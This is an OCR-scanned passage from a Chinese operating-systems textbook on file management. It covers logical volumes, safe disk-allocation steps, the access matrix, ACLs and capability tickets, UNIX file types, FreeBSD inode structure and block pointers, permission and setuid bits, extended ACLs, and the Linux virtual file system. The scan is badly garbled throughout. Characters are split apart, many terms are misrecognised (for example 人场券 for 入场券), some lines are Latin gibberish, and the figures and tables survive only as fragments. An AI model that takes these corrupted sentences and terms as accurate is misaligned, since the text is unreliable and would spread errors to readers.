不 同 的 操作 系统 和 不 同 的 文件 管理 系统 使 用 的 卷 的 概念 多 少 会 有 不 同 ,， 但 是 从 本 质 上 来 讲 ， 
卷 是 一 个 逻辑 的 磁盘 。[CARR05] 这 样 定义 卷 的 概念 : 

卷 : 一 组 在 二 级 存储 上 面 的 可 寻 址 的 遍 区 的 集合 , 操作 系统 或 者 应 用 程序 用 卷 来 进行 数据 存 
储 。 一 个 卷 里 面 的 凯 区 不 需要 在 物理 存储 设备 上 是 连续 的 ; 相反 ,只 需要 对 于 操作 系统 或 者 应 用 
程序 来 讲 是 连续 的 。 一 个 卷 可 能 是 更 小 的 卷 合并 或 者 组 合 的 结果 。 
在 最 简单 的 情况 下 ， 一 个 单独 的 磁盘 就 是 一 个 卷 。 通 常 ， 一 个 磁盘 会 被 分 为 几 个 分 区 ， 每 个 分 区 
都 会 作为 一 个 单独 的 卷 来 工作 。 


12.6.4 可靠 性 


考虑 以 下 情况 : 

1) 用 户 A 请 求 给 一 个 已 存在 的 文件 增加 文件 分 配 。 

2) 该 请 求 被 批准 ， 磁 盘 和 文件 分 配 表 在 内 存 中 被 更 新 ， 但 没有 在 磁盘 中 更 新 。 

3) RRA, MAAR. 

4) 用 户 B 请 示 一 个 文件 分 配 ， 并 且 被 分 配给 一 块 磁盘 空间 ,覆盖 了 上 一 次 分 配给 用 户 A 的 
空间 。 

5 ) 用 户 A 通过 保存 在 A 的 文件 中 的 引用 访问 被 覆盖 的 部 分 。 

当 系 统 为 了 提高 效率 而 在 内 存 中 保留 磁盘 分 配 表 和 文件 分 配 表 的 副本 时 会 出 现 问 题 ,为 避免 

这 类 错误 ， 当 请 求 一 个 文件 分 配 时 ,需要 执行 以 下 步 又: 

1) 在 磁盘 中 对 磁盘 分 配 表 加 锁 ， 这 可 以 防止 在 分 配 完 成 以 前 另 一 个 用 户 修改 这 个 表 。 

2) 查找 磁盘 分 配 表 ， 查 找 可 用 空间 。 这 里 假设 磁盘 分 配 表 的 副本 总 是 在 内 存 中 ， 如 果 不 在 ， 
则 必须 先 读 人。 

3 ) 分 配 空间 ， 更 新 磁盘 分 配 表 ， 更 新 磁盘 。 更 新 磁盘 包括 把 磁盘 分 配 表 写 回 到 磁盘 。 对 于 
链接 磁盘 分 配 ， 它 还 包括 更 新 磁盘 中 的 某 些 指 针 。 

4) 更 新 文件 分 配 表 和 更 新 磁盘 。 

5 ) 对 磁盘 分 配 表 解 锁 。 
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这 种 技术 可 以 防止 错误 。 但 是 ， 当 频繁 地 分 配 比较 小 的 块 时 ， 就 会 对 性 能 产生 重要 的 影响 。 
为 减少 这 种 开销 ,可 以 使 用 一 种 批 存储 分 配方 案 。 在 这 种 情况 下 , 为 了 分 配 , 可 以 先 获 得 磁盘 上 
的 一 批 空闲 块 ， 而 它们 在 磁盘 上 的 相应 部 分 被 标记 为 “已 用 "。 使 用 这 一 批 的 块 的 分 配 在 内 存 中 
进行 。 当 这 一 批 用 完 后 ， 更 新 磁盘 上 的 磁盘 分 配 表 ,并 获得 新 的 一 批 。 如 果 发 生 了 系统 崩溃 ， 磁 
盘 上 标记 为 “已 用 ”的 部 分 在 它们 被 重新 分 配 之 前 ， 必 须 通过 某 种 方式 清空 。 这 种 用 于 清空 的 技 
术 取 决 于 文件 系统 的 特性 。 


12.7 文件 系统 安全 


只 有 在 登录 成 功 以 后 , 用 户 才 会 被 赋予 权限 访问 一 个 或 多 个 主机 和 应 用 程序 , 这 种 做 法 对 于 数 
据 库 中 有 敏感 数据 的 系统 来 说 是 不 够 的 。 通 过 用 户 访问 控制 程序 ， 用户 可 以 被 系统 识别 。 系 统 中 会 
有 一 个 与 每 个 用 户 相 关 的 配置 文件 ， 用 来 指定 用 户 操作 和 访问 文件 的 权限 。 操 作 系 统 基 于 用 户 配置 
文件 来 实施 权限 控制 规则 。 但 是 ,数据 库 管 理 系统 必须 控制 特定 的 记录 或 一 部 分 记录 。 例 如 ， 每 个 
人 都 有 权限 获得 公司 员工 列表 , 但 是 只 有 一 部 分 经 过 挑选 的 人 才 有 权限 获得 员工 薪水 信息 。 这 个 问 
题 并 不 仅仅 是 一 个 细 化 程度 的 问题 。 尽 管 操作 系统 赋予 用 户 访 问 文件 或 者 使 用 应 用 程序 的 权限 , 但 
是 并 没 进行 深 一 步 的 安全 检查 ,数据 库 管 理 系 统 必须 对 每 个 人 的 访问 尝试 做 出 决定 ， 这 个 决定 不 仅 
依赖 用 户 的 标识 ， 也 依赖 于 被 访问 数据 的 特定 部 分 ， 甚 至 依赖 于 已 经 透露 给 用 户 的 信息 。 

经 常 在 文件 或 数据 库 管理 系统 中 运用 的 访问 控制 模型 叫做 访问 矩阵 (图 12.13a， 基 于 [SAND94] 
的 图 )， 这 个 模型 的 基本 元 素 如 下 所 述 : 

@ 主体 : 有 能 力 访 问 对 象 的 实体 ， 一 般 来 说 ， 实 体 的 概念 等 同 于 进程 的 概念 ， 任 何 一 个 用 

户 或 应 用 程序 通过 代表 它们 自己 的 进程 来 获得 访问 对 象 的 权限 。 
@ 对 象 : 可 以 被 访问 和 控制 的 任何 实体 ， 比 如 文件 、 文 件 局 部 数据 、 程 序 、 内 存 块 以 及 软 
件 中 的 对 象 ( 如 Java 对 象 )。 

o 访问 权限 : 主体 访问 对 象 的 方式 ， 比 方 读 、 写 、 执 行 以 及 使 用 软件 对 象 的 功能 。 

和 矩阵 的 一 个 维度 是 正在 试图 访问 数据 的 被 认证 后 的 主体 。 虽 然 可 以 通过 终端 、 主 机 或 应 用 程 
序 来 替代 或 者 辅助 用 户 来 控制 访问 , 但 是 这 个 名 单 里 一 般 地 仅 包括 单独 的 用 户 和 用 户 组 。 另 一 个 
维度 列 出 了 被 访问 的 对 象 。 在 最 细 化 的 情况 下 ,对 象 可 能 就 是 一 个 数据 域 。 更 多 的 聚集 组 , 例如 
记录 、 文件 甚至 整个 数据 库 都 可 以 作为 矩阵 中 的 对 象 。 和 矩阵 中 的 每 个 单元 代表 了 主体 对 对 象 的 访 
问 权 限 。 

实际 上 ， 访 问 矩 阵 通常 是 稀 朴 的 ,可 以 通过 两 种 划分 方法 来 表示 。 和 矩阵 可 以 按 列 划分 ， 就 生 
成 了 访问 控制 列表 (OLA 12.13b )。 那 么 ， 对 于 每 个 对 象 ， 一 个 访问 控制 列表 列 出 了 用 户 以 及 他 
们 的 访问 权限 。 访 问 控制 列表 包含 了 一 个 默认 或 公共 的 单元 。 这 人 允许 没有 被 明确 指出 有 哪些 权限 
的 用 户 具 有 默认 的 权限 。 这 个 列表 包括 了 单独 的 用 户 ， 也 包括 了 用 户 组 。 

依照 行 划分 就 会 产生 权能 人 场 券 ( 见 图 12.13c )。 一 个 权能 人 场 券 指定 了 用 户 被 授权 的 对 象 
和 操作 。 每 个 用 户 有 许多 人 场 券 ,同时 可 以 授权 给 别人 。 因 为 系统 的 入 场 券 可 能 会 消失 ,这 就 意 
味 着 会 有 比 访问 控制 列表 更 大 的 安全 问题 , 尤其 是 用 户 的 人 场 券 是 可 能 伪造 的 。 为 了 解决 这 些 问 
题 , 让 操作 系统 替 用 户 控制 着 权能 人 场 券 是 一 种 很 好 的 方法 。 这 些 人 场 券 数据 需要 放 在 用 户 不 可 
访问 的 内 存 区 域 。 

网 络 需 要 同时 考虑 基于 数据 的 访问 控制 和 基于 用 户 的 访问 控制 这 两 种 情况 。 如 果 仅 有 一 部 分 
用 户 被 允许 访问 特定 的 数据 , 那么 在 传送 给 这 些 用 户 时 需要 加 密 保 护 这 些 数据 。 一般 来 说 , 数据 
访问 控制 可 以 给 予 更 多 的 权利 , 可 以 由 基于 主机 的 数据 库 管理 系统 控制 。 如 果 一 个 网 络 数据 库 服 
务 器 存在 于 网 络 中 ， 那 么 数据 访问 控制 变 成 了 一 个 网 络 功能 。 
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a) 访问 矩阵 


文件 1 用 户 A 





文件 2 用 户 B 


文件 3 用 户 C 





c) a 部 分 的 权限 列表 


文件 4 





b) 文件 的 访问 控制 列表 
图 12.13 访问 控制 架构 的 示例 


12.8 UNIX 文件 管理 


UNIX 区 分 六 种 类 型 的 文件 : 

@ 普通 文件 : 文件 中 包含 的 信息 是 由 用 户 、 应 用 程序 或 系统 实用 程序 输入 的 。 文 件 系 统 在 
普通 文件 上 不 强加 任何 内 部 结构 ， 把 它们 看 做 字 节 流 。 

e BR: 包含 文件 名 列表 和 指向 与 之 相关 联 的 索引 节点 (index node) HHH. ARBRE 
次 结构 组 织 的 ( 如 图 12.4 所 示 )。 目 录 文件 实际 上 是 具有 特殊 的 写 保护 特权 的 普通 文件 ， 
从 而 使 得 只 有 文件 系统 才能 够 对 它 进行 写 操作 ， 但 是 所 有 用 户 程序 都 允许 对 它 进行 读 访 
问 。 

@ 特殊 文件 : ' 不 包含 数据 ,但 是 提供 了 一 个 映射 物理 设备 到 一 个 文件 名 的 机 制 。 文 件 名 用 
于 访问 外 围 设备 ， ORS T D SE I A 请 参 
阅 11.8 节 的 描述 。 

。。 命 名 管道， 如 6.7 闻 所 六 述 的 ， 管 道 是 进程 间 通 信 的 一 个 基础 设施 。 管 道 缓存 了 其 输入 
端 所 接收 的 数据 ， 以 便 在 管道 输出 端 读 的 进程 能 以 先进 先 出 的 方式 来 接收 数据 。 

@ 链接 文件 : 实际 上 一 个 链接 是 一 个 已 经 存在 的 文件 的 另 一 个 可 选择 的 文件 名 。 

@ 符号 链接 文件 : 这 是 一 个 数据 文件 ， 该 文件 包含 了 其 所 链接 的 文件 的 文件 名 。 

本 节 所 关注 的 主要 是 普通 文件 的 处 理 ， 这 也 是 大 多 数 系 统 处 理 文 件 的 方式 。 
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12.8.1 索引 节点 


现代 的 UNIX 操作 系统 支持 多 种 文件 系统 ， 但 是 把 所 有 的 文件 系统 都 映射 到 了 一 个 统一 的 ， 
下 层 的 系统 中 , 这 个 系统 用 来 支持 文件 系统 和 给 文件 分 配 磁盘 空间 。 所 有 类 型 的 UNIX 文件 都 是 
由 操作 系统 通过 索引 节点 来 管理 的 。 索 引 节点 是 一 个 控制 结构 , 包含 操作 系统 所 需要 的 关于 某 个 
文件 的 关键 信息 。 可 以 有 多 个 文件 名 与 一 个 索引 节点 相关 联 , 但 是 一 个 活跃 的 索引 节点 只 能 与 一 
个 文件 相关 联 ， 并 且 每 个 文件 只 能 由 一 个 索引 节点 来 控制 。 

文件 的 属性 、 访 问 权 限 以 及 其 他 控制 信息 都 保存 在 索引 节点 中 。 具 体 的 索引 节点 的 结构 会 随 
着 UNIX 的 实现 不 同 而 发 生变 化 。 在 图 12.14 中 描述 了 FreeBSD 的 索引 节点 的 结构 , 包括 以 下 数 
据 元 素 : 





















| 模式 | A 

: 

| Data | | Data 
i co /SE ， 
make 


= 
a 
H 
=Æ 
a 





12.14 FreeBSD 的 索引 节点 和 文件 的 结构 


© 文件 的 类 型 和 访问 模式 。 

© 文件 的 所 有 者 和 组 访问 标示 符 。 

@ 文件 创建 的 时 间 ， 以 及 最 近 一 次 读 和 写 的 时 间 ， 最 近 一 次 索引 节点 被 系统 更 新 的 时 间 。 

@ 文件 的 大 小 ， 按 字 节 表示 。 

© 一 系列 的 块 指 针 ， 在 后 面 小 节 中 会 具体 解释 。 

o 文件 使 用 的 物理 磁盘 块 的 个 数 ， 包 括 用 于 储存 间接 指针 和 属性 的 块 。 

@ 内 核 和 用 户 可 以 设置 的 用 于 描述 文件 特征 的 标志 位 。 

@ 文件 的 产生 数 〈 每 次 索引 节点 被 分 配给 一 个 新 的 文件 的 时 候 ， 一 个 随机 选择 的 数字 被 分 
配给 索引 节点 ， 产 生 数 用 来 监测 指向 被 删除 的 文件 的 引用 ) 。 
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@ 被 索引 节点 引用 的 数据 块 的 块 大 小 (通常 的 情况 下 ， 是 和 文件 系统 的 块 大 小 一 样 ， 但 是 
有 时 候 也 会 大 于 文件 系统 的 块 大 小 ) 。 

@ 扩展 属性 信息 的 大 小 。 

@ 零 个 或 多 个 扩展 属性 条 目 。 

通常 的 情况 下 , 块 的 大 小 这 个 值 是 和 文件 系统 的 块 大 小 一 样 , 但 是 有 时 候 也 会 大 于 文件 系统 
的 块 大 小 。 在 传统 的 UNIX 系统 上 ， 使 用 固定 的 512 字 节 的 块 大 小 。FreeBSD 最 小 的 块 大 小 是 
4096 F (4K) ; 块 大 小 可 以 是 大 于 或 等 于 4096 的 2 的 任意 次 寡 。 对 于 通常 的 文件 系统 ， 块 大 
小 是 8K 或 16K。FreeBSD 中 默认 的 块 大 小 是 16K。 

扩展 属性 条 目的 长 度 是 可 变 的 , 用 来 存储 和 文件 内 容 无 关 的 辅助 数据 。FreeBSD 中 前 两 个 定 
义 的 扩展 属性 是 和 安全 有 关 的 。 第 一 个 支持 访问 控制 列表 ， 在 15 章 将 会 讲 到 。 第 二 个 定义 的 扩 
展 属 性 支持 安全 标签 的 使 用 ， 这 是 强制 访问 控制 策略 的 一 部 分 ， 同 样 也 在 15 章 中 讲述 。 

在 磁盘 上 ,有 一 个 包含 文件 系统 所 有 文件 的 索引 节点 的 索引 节点 表 或 索引 节点 列表 。 当 一 个 
文件 打开 时 ， 该 文件 的 索引 节点 读 人 内 存 ， 保 存在 驻 留 在 内 存 的 索引 节点 表 中 。 


12.8.2 ”文件 分 配 


文件 的 分 配 是 以 块 为 基础 完成 的 。 分 配 是 按照 需要 动态 地 进行 的 ,而 不 是 预定 义 的 分 配 。 因 
此 ， 文 件 在 磁盘 中 的 块 并 不 需要 一 定 是 连续 的 。 系 统 为 了 知道 每 一 个 文件 ， 采 用 一 种 索引 方法 ， 
索引 的 一 部 分 保存 在 该 文件 的 索引 节点 中 。 所 有 的 UNIX 实现 中 ， 索 引 节点 都 包含 一 些 直接 指针 
和 三 个 间接 指针 (一 级 、 二 级 、 三 级 ) 。 
FreeBSD 索引 节点 包括 120 个 字 节 的 地 址 ， 通 常 被 组 织 成 15 个 64 位 的 地 址 或 指针 。 前 12 
个 地 址 指向 了 文件 的 前 12 个 数据 块 ， 如 果 文 件 需 要 多 于 12 个 的 数据 块 ， 那 么 按照 下 面 的 方式 ， 
使 用 一 级 或 者 更 多 级 的 间接 寻 址 : 
e 索引 节点 中 的 第 13 个 地 址 指向 磁盘 中 包含 下 一 部 分 索引 的 块 , 称 做 一 级 间接 块 。 这 一 块 
包含 指向 文件 中 后 继 块 的 指针 - 
@ 如 果 文 件 中 包含 更 多 的 块 , 索引 节点 中 的 第 14 个 地 址 指向 一 个 二 级 间接 块 , 这 一 块 包含 
另外 的 一 级 间接 块 地 址 列表 ， 每 个 一 级 间接 块 ， 依 次 包含 指向 文件 块 的 指针 。 
© 如 果 文 件 仍然 包含 更 多 的 块 , 索引 节点 中 的 第 15 个 地 址 指向 一 个 三 级 间接 块 , 它 是 一 个 
三 级 索引 。 这 个 块 指向 另外 的 二 级 间接 块 。 
所 有 这 些 如 图 12.14 所 示 。 一 个 文件 包含 的 数据 块 的 总 数目 取决 于 系统 中 国定 大 小 的 块 的 容 
量 。 在 FreeBSD 系统 中 ， 最 小 的 块 大 小 是 4 多 ， 并 且 每 块 最 多 保存 512 个 块 地 址 。 因 此 ， 在 该 方 
案 下 ， 文 件 的 最 大 大 小 可 以 超过 500GB( 如 表 12.4 所 示 )。 
这 种 方案 有 以 下 几 点 好 处 : 
1) 索引 节点 大 小 固定 ， 并 且 相 对 比较 小 ， 因 而 可 以 在 内 存 中 保留 比较 长 的 时 间 。 
2 ) 小 文件 可 以 通过 很 少 的 间接 访问 或 不 通过 间接 访问 ， 从 而 减少 了 处 理 时 间 和 磁盘 访问 
时 间 。 
3) 理论 上 ， 文 件 大 小 对 所 有 的 应 用 程序 来 说 都 是 足够 的 。 


表 12.4 一 个 块 大 小 为 4K 的 FreeBSD 文件 的 容量 


级 块 数 字 节 数 
直接 12 48KB 
一 级 间接 512 2M 
二 级 间接 $12 x 512=256K 1G 


三 级 间接 512 x 256K=128M 512GB 
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12.83 目录 


目录 组 织 成 一 个 层次 树 。 每 一 个 目录 可 以 包含 文件 和 其 他 目录 。 包含 在 另外 一 个 目录 中 的 目 
录 称 为 子 目 录 。 如 前 面 所 阑 述 的 , 一 个 目录 是 一 个 包含 文件 名 列表 和 指向 相关 索引 节点 的 指针 的 
文件 。 图 12.15 展示 了 目录 的 整体 结构 。 每 一 个 目录 项 包含 一 个 相关 的 文件 各 或 目录 名 和 称 为 索 
引 节点 号 的 整数 。 当 文件 或 目录 被 访问 时 ， 其 索引 节点 号 被 用 做 索引 节点 表 的 索引 。 


索引 节点 表 目录 





12.15 UNIX 目录 和 索引 节点 


12.8.4 ” 卷 结构 


一 个 UNIX 文件 系统 驻 留 在 一 个 单一 逻辑 磁盘 或 磁盘 分 区 上 ， 包 含 以 下 元 素 : 

e 引导 块 (boot block): 包含 引导 操作 系统 的 代码 。 

@ 超级 块 (super block): 包含 有 关 文 件 系统 的 属性 和 信息 , 如 分 区 大 小 和 索引 节点 表 大 小 。 
@ 索引 节点 表 (inode table): 系统 中 的 所 有 文件 的 索引 节点 的 集合 。 

@ XR (data block): 数据 文件 和 子 目 录 所 需 的 存储 空间 。 


12.8.5 “传统 的 UNIX 文件 访问 控制 


KER UNIX 系统 依赖 于 或 者 至 少 是 基于 随 早 期 版 本 UNIX 引入 的 文件 访问 控制 方案 。 每 一 
个 UNIX 用 户 被 指定 一 个 独一无二 的 标识 号 ( 用户 ID ), 一 个 用 户 也 是 一 个 “ 主 组 ”的 成 员 ， 并 
且 很 可 能 是 许多 其 他 组 的 成 员 ， 每 一 个 组 都 用 一 个 组 ID 标识 。 当 一 个 文件 被 创建 ， 它 被 指定 为 
属于 一 个 特殊 的 用 户 并 且 以 用 户 ID 标识 。 此 外 ， 它 还 属于 一 个 特定 的 组 ， 初 始 的 时 候 是 它 的 创 
建 人 的 主 组 或 者 它 的 父 目录 的 组 ( 如 果 这 个 目录 有 SetGID 权限 集合 )。 与 每 一 个 文件 相关 联 的 
是 一 组 12 个 保护 位 。 所 有 者 ID、 组 ID 和 保护 位 都 是 文件 索引 节点 的 一 部 分 。 

其 中 的 9 个 保护 位 明确 了 文件 所 有 者 、 文 件 所 从 属 的 组 中 的 其 他 成 员 以 及 所 有 其 他 用 户 的 
读 、 写 和 执行 的 权限 。 通 过 使 用 最 相关 的 权限 集合 ,构成 了 一 个 包含 所 有 者 、 组 和 其 他 用 户 的 层 
次 结构 。 图 12.16a 给 出 一 个 例子 ， 其 中 文件 所 有 者 有 读 和 写 的 权限 ， 这 个 文件 从 属 的 组 中 的 其 
他 成 员 有 读 取 的 权限 , 组 外 的 用 户 没 有 访问 的 权限 。 当 这 9 个 保护 位 用 于 一 个 目录 的 时 候 , KG 
位 允许 列举 、 创 建 / 重 命名 /删除 目录 中 的 文件 9 。 执 行 位 允许 在 目录 中 查找 文件 名 。 


O 要 注意 应 用 到 目录 的 权限 与 应 用 到 这 个 目录 包含 的 文件 或 子 目录 的 权限 是 不 同 的 。 用 户 有 权限 写 一 个 目录 不 
代表 该 用 户 也 有 权限 写 该 目录 下 的 文件 。 能 不 能 写 文件 ， 是 由 文件 本 身 的 权限 决定 的 。 当 然 ， 用 户 具有 重 命 
名 目录 下 的 文件 的 权限 。 
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其 余 三 个 位 定义 文件 和 目录 的 特殊 的 附加 行为 。 其 中 两 个 是 “设置 用 户 ID” 和 “设置 组 ID” 
权限 。 如 果 这 些 是 应 用 在 一 个 可 执行 文件 ,操作 系统 按照 如 下 方法 运行 。 当 一 个 用 户 ( 有 执行 特 
AL) 执行 该 文件 ， 系 统 会 临时 分 配 相应 的 文件 创建 者 的 用 户 ID 的 权限 或 者 文件 从 属 的 组 的 权限 
给 他 ， 让 用 户 来 执行 文件 。 这 些 称 为 “有 效用 户 ID ”和 “有 效 组 ID”， 当 做 出 对 这 个 程序 的 
访问 控制 的 决定 的 时 候 和 执行 者 的 “真实 用 户 ID” 和 “真实 组 ID” 一 起 使 用 。 这 种 变化 只 有 在 
该 程序 正在 执行 时 才 是 有 效 的 。 这 一 特点 使 得 创建 和 使 用 特权 程序 成 为 可 能 , 特权 程序 可 能 会 使 
用 那些 正常 情况 下 对 于 其 他 用 户 不 可 访问 的 文件 。 它 使 用 户 能 够 在 可 控制 的 方式 下 访问 某 些 文 
件 。 另 外 ， 当 被 应 用 于 目录 时 ，SetGID 权限 表明 新 创建 的 文件 将 继承 这 一 目录 的 组 ， 目 录 的 
SetUID 权限 会 被 忽略 。 

最 后 的 权限 位 是 “粘性 ”位 。 当 应 用 于 一 个 文件 , 它 原先 表示 在 执行 之 后 系统 应 在 内 存 中 保 
留 文件 内 容 , 现在 已 不 再 使 用 。 当 被 应 用 于 一 个 目录 时 , 它 指明 目录 中 任意 文件 的 所 有 者 可 以 重 
命名 、 移 动 或 删除 该 文件 。 对 于 管理 共享 的 临时 目录 这 是 有 用 的 。 

一 个 特定 的 用 户 ID 已 被 指定 为 “超级 用 户 ”。 超 级 用 户 可 以 免除 通常 的 文件 访问 控制 的 限制 ， 
并 具有 访问 整个 系统 的 权限 。 任 何 属于 并 且 设 置 SetUID 为 “超级 用 户 ” 的 程序 ， 都 潜在 地 给 执行 
这 个 程序 的 用 户 赋予 了 一 种 不 受 限 制 的 访问 系统 的 权限 。 因 此 ， 编 写 这 样 的 程序 需要 非常 着 慎 。 

当 文 件 访问 需求 与 用 户 以 及 包含 适度 数量 用 户 的 组 相关 联 时 ， 这 一 访问 方案 是 可 以 胜任 的 。 
例如 ， 假 设 一 个 用 户 想 给 用 户 A 和 B 对 文件 X ERA, AAP B 和 C 对 文件 Y 写 的 权限 。 
我 们 将 需要 至 少 两 个 用 户 组 ,并且 为 了 访问 这 两 个 文件 ， 用 户 B 需要 同时 属于 这 两 个 组 。 但 是 ， 
如 果 有 大 量 的 不 同 分 组 的 用 户 对 不 同 的 文件 需要 一 系列 的 访问 权限 ,那么 可 能 就 需要 非常 大 数量 
的 组 。 即 使 是 可 能 的 ,这 也 会 迅速 变 得 腾 肿 ,难于 管理 9 。 克 服 这 个 问题 的 一 个 办 法 是 使 用 访问 
控制 列表 ， 大 多 数 现代 的 UNIX 系统 都 提供 这 个 访问 控制 列表 。 

最 后 一 点 需要 注意 的 是 , 传统 的 UNIX 文件 访问 控制 方案 实现 了 一 个 简单 的 保护 域 结构 。 域 
是 与 用 户 相 关联 的 ， 并 且 切 换 域 对 应 的 是 临时 改变 用 户 ID。 


12.8.6 UNIX 中 的 访问 控制 列表 


当前 许多 UNIX 和 基于 UNIX 的 操作 系统 支持 访问 控制 列表 ， 包 括 FreeBSD, OpenBSD, 
Linux 和 Solaris。 在 本 节 中 , 我 们 只 讨论 FreeBSD 操作 系统 的 实现 方法 ,其 他 操作 系统 的 实现 方 
法 从 本 质 上 来 讲 都 具有 同样 的 特点 和 接口 。 传 统 的 UNIX 实现 方法 称 为 最 小 访问 控制 列表 , 而 这 
里 所 讨论 的 方法 称 为 扩展 的 访问 控制 列表 。 

FreeBSD 操作 系统 允许 管理 员 用 setfacl 命令 将 一 系列 的 UNIX 的 用 户 ID 和 组 分 配给 一 个 文 
件 。 一 个 文件 可 以 与 任何 数量 的 用 户 和 组 相关 联 ， 每 个 用 户 和 组 都 对 应 3 个 保护 位 ( 读 、 写 、 执 
行 )， 这 样 就 为 访问 权限 的 分 配 提供 了 一 种 灵活 的 机 制 。 文 件 不 需要 访问 控制 列表 ,但 是 有 可 能 
完全 被 传统 的 UNIX 文件 访问 机 制 所 保护 ,FreeBSD 中 的 文件 包括 一 个 额外 的 保护 位 , 该 位 指明 
这 个 文件 是 否 有 扩展 的 访问 控制 列表 。 

FreeBSD 和 大 多 数 UNIX 操作 系统 都 支持 扩展 的 访问 控制 列表 ,其 实现 方法 基于 下 面 的 策略 
(如 图 12.16b 所 示 ): 

1 ) 在 9 位 权限 域 中 所 有 者 类 的 项 和 其 他 类 的 项 与 最 小 访问 控制 列表 中 的 一 样 。 

2) 文件 从 属 的 组 的 权限 由 组 类 的 项 来 指定 。 这 些 权 限 表示 的 是 可 以 分 配给 命名 用 户 或 命名 

组 的 最 大 权限 ， 而 不 是 所 有 者 。 在 这 之 后 的 角色 中 ,组 类 的 项 还 起 到 掩 码 的 作用 。 
3) 另外 ， 命 名 的 用 户 和 组 可 能 会 关联 到 文件 ， 每 一 个 都 具有 3 位 权限 域 。 给 一 个 命名 用 户 


O 大 多 数 UNIX 系统 中 ， 对 一 个 用 户 可 属于 的 组 的 数 日 以 及 系统 中 能 包含 的 组 的 总 数 都 做 了 限制 。 
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或 命名 组 列 出 的 权限 将 会 与 掩 码 域 比较 。 给 命名 用 户 和 组 的 权限 中 , 任何 没有 在 掩 码 域 


中 出 现 过 的 都 是 非法 的 。 
Ay ail oF 
Rs g 
& S S 
[aie j] 
用 户 : :rw- 
组 ::z-- 
其 他 ::--- 
a) 传统 UNIX 方法 ( 最 小 访问 控制 列表 ) 
ca, 奉 
Ni 
各 s 
| tere | ee | en | 
HP: rw- 
pe 用 户 :joe:rw- 
entries 组 ::r-- 
#805: :rw- 


其 他 ::--- 
b) 扩展 的 访问 控制 列表 


图 12.16 UNIX 文件 访问 控制 


当 一 个 进程 要 求 访问 一 个 文件 系统 对 象 时 , 需要 执行 以 下 两 个 步 又。 第 一 步 , 选择 与 进程 匹 
配 最 为 紧密 的 访问 控制 列表 条 目 。 访问 控 制 列表 条 目 按照 以 下 列 顺序 进行 查找 : 所 有 者 、 命 名 用 
户 、( 文 件 从 属 的 或 者 命名 的 ) 组 及 其 他 ， 只 有 单一 条 目 可 确定 访问 。 第 二 步 , 检查 所 匹配 的 条 
目 是 否 包 含 关键 权限 。 一 个 进程 可 以 作为 一 个 或 多 个 群 组 中 的 成 员 ; 这 样 就 有 多 个 群 组 条 目 能 够 
匹配 上 。 如果 这 些 匹配 上 的 群 组 条 目 中 包含 要 求 的 权限 , 那么 包含 那些 权限 的 一 个 条 目 就 被 挑选 
出 来 (不管 哪个 条 目 被 挑选 出 来 , 结果 都 是 一 样 的 )。 如 果 没 有 能 够 匹配 的 包含 要 求 权 限 的 群 组 
条 目 ， 那 么 不 管 哪个 条 目 被 挑 出 来 ， 访 问 都 将 被 禁止 。 


12.9 Linux 虚拟 文件 系统 


Linux 包含 一 个 通用 的 、 强 有 力 的 文件 处 理 机 制 ， 该 机 制 利用 虚拟 文件 系统 ( Virtual File 
System, VFS) 来 支持 大 量 的 文件 管理 系统 和 文件 结构 。VFS 向 用 户 进程 提供 了 一 个 简单 的 ， 统 
一 的 文件 系统 接口 。VFS 定义 了 一 个 能 代表 任何 可 想到 的 文件 系统 的 通用 特征 和 行为 的 通用 文 
件 模型 。VFS 认为 文件 是 计算 机 大 容量 存储 器 上 的 对 象 。 这 些 计算 机 大 容量 存储 器 具有 共同 的 
特征 , 这 与 目标 文件 系统 或 底层 的 处 理 器 硬件 无 关 。 文件 有 一 个 符号 名 ,以 便 在 一 个 文件 系统 的 
特定 目录 下 能 唯一 地 标识 该 文件 。 同 时 文件 有 一 个 所 有 者 、 对 未 授权 的 访问 或 修改 的 保护 和 其 他 
一 系列 属性 。 文 件 可 以 被 创建 、 从 中 读 、 向 它 写 或 删除 。 对 于 任何 特定 文件 系统 ,需要 一 个 映射 
模块 来 转换 实际 文件 系统 的 特征 到 虚拟 文件 系统 所 期 望 的 特征 。 

图 12.17 展示 了 Linux 文件 系统 策略 的 关键 组 成 成 分 。 用 户 进程 通过 使 用 VFS 文件 方案 来 发 
起 文件 系统 调用 。VFS 通过 特定 文件 系统 的 一 个 映射 函数 转换 该 系统 调用 到 内 部 的 一 个 特定 文 
件 系 统 的 功能 调用 (例如 IBM 的 JFS )。 在 很 多 情况 下 ， 了 映射 函数 仅仅 是 一 个 方案 的 文件 系统 功 
能 调用 到 另 一 个 方案 的 文件 系统 功能 调用 的 映射 。 在 某 些 情 况 下 ,映射 函数 会 比较 复杂 。 例 如 ， 
一 些 文件 系统 使 用 存储 目录 树 中 每 个 文件 位 置 的 文件 分 配 表 。 在 这 些 文件 系统 中 , 目录 并 不 是 文 
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件 。 这 些 文件 系统 的 映射 函数 必要 时 必须 能 动态 创建 与 目录 相对 应 的 文件 。 在 任何 情况 下 ， 原 来 
用 户 的 文件 系统 调用 必须 转换 成 目标 文件 系统 的 调用 。 这 样 就 调用 了 目标 文件 系统 的 相应 功能 去 
完成 在 文件 或 目录 上 的 相应 请 求 ， 该 操作 的 结果 以 类 似 的 方式 返回 给 用 户 进程 。 





系统 调用 接口 


硬件 


12.17 Linux 虚拟 文件 系统 上 下 文 


VFS 在 Linux 内 核 中 所 起 的 作用 如 图 12.18 所 示 。 当 进程 发 起 一 个 面向 文件 的 系统 调用 时 ， 
内 核 调用 VFS 中 的 一 个 函数 。 该 函数 处 理 完 与 具体 文件 系统 无 关 的 操作 后 ， 调 用 目标 文件 系统 
中 的 相应 函数 。 这 个 调用 通过 一 个 转换 VES 的 调用 到 目标 文件 系统 调用 的 映射 函数 来 实现 。 VFS 
独立 于 任何 具体 文件 系统 。 因 此 映射 函数 的 实现 是 文件 系统 在 Linux 上 的 实现 的 一 部 分 。 目 标 文 
件 系 统 转换 文件 系统 请 求 到 面向 设备 的 指令 。 


使 用 VFS 用 使 用 文件 系 
户 接口 的 系 全 CERERI 统 义 接口 
统 调用 的 系统 调用 





由 文件 系统 X 
维护 的 二 级 存 
储 上 的 文件 


图 12.18 Linux 串 拟 文件 系统 概念 


VFS 是 一 个 面向 对 象 的 方案 。 因 为 VFS 不 是 用 支持 面向 对 象 的 语言 (如 C++ 和 Java) 来 实 
现 的， 而 是 使 用 C 语言 来 实现 的 ， 因 此 VFS 的 对 象 可 以 简单 地 实现 为 C 语言 的 结构 。 每 一 个 对 
象 包含 数据 和 函数 指针 。 这 些 函 数 指针 指向 操作 这 些 数据 的 文件 系统 的 实现 函数 。VFS 主要 的 
